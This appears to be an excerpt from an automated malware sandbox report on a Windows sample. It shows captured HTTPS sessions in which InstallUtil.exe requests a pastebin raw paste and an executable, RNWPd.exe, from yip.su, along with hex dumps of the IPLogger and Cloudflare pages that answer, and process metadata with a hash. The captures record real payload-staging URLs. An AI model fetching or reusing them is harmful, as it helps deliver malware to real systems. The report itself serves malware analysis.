                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:02:17 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eYB%2Fr48SBGwlmQp%2BHSJO8dmcLvMTtyHYNh9iiLWdwkxQnrwvxgCVhwbvnY%2Bue0NLm%2FtwvgGvziz0eKzNEboyEelMjdeRnJWaV6U%2BSneGUItOTZBoqSSvBYA%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aafb268234217-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:18 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:18 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                                                Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                                                2024-08-09 21:02:18 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                                                Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                                                2024-08-09 21:02:18 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:02:18 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:02:18 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:02:18 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.649755172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:22 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:23 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aafd189790f3e-EWR
                                                2024-08-09 21:02:23 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:23 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:23 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:23 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.649756188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:02:24 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:24 UTC898INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:24 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:24 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAIRGSDVmv3di3o0iAKhejJh15pJf03QiQQG0QUt519gG%2BOAITQWoONN7UWRnUpYOf3Bo8HP12Eguts%2B5FZR2DRxTzS6BkjDLzi6wu1v7LlWZqEyrifnWbI%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aafdaaee68ce2-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:24 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:24 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                                                Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                                                2024-08-09 21:02:24 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                                                Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                                                2024-08-09 21:02:24 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                                                Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                                                2024-08-09 21:02:24 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                                                Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                                                2024-08-09 21:02:24 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:02:24 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:17:00:16
                                                Start date:09/08/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xfb0000
                                                File size:9'643'376 bytes
                                                MD5 hash:A7F1B43BB75327181BF5535F6EAB329D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
